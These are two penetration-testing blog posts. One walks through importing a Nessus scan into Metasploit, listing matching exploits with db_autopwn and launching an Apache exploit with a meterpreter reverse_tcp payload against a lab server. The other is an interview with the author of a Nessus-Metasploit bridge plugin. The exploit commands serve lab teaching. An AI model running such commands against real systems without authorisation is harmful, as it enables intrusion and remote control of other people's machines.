From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
  • ./msfconsole
  • svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation

 

Nessus and Metasploit living in harmony

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post, being a fan of both Metasploit and Nessus I was very happy when I saw a tweet a month or so back making mention of a project that would bring both of these wonderful tools together in a nice easy to use fashion. That project was labeled ” Nessus Bridge for Metasploit”. The basic goal behind this project was to  allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines form the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories below and are covered in details over at the http://blog.zate.org .

A few prerequisites are needed before you can start hacking away:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
  • A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

  1. First fire-up  both Metasploit and Nessus and run an update to ensure you have the latest signatures.
  2. Login into Nessus and create your scanning policy
  3. Close out your browser and prepare to have some fun CLI style!
    1. Load up the nessus module within msfconle with “load nessus”
    2. Next connect to your nessus server with “nessus_connect username:password@host:port ok”
    3. From this point on you can view all polices, perform a scan, import the rules and then use db_autopwn to seal the deal.
      Using nessus_policy_list and nessus_scan_new
    4. Import scan results with “nessus_report_get report id”

      db_autopwn

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else
to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought what if i could stick that library in Metasploit and talk directly to the my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which i used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work :).

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what’s the best approach?Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploitfork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

A: You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code
when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.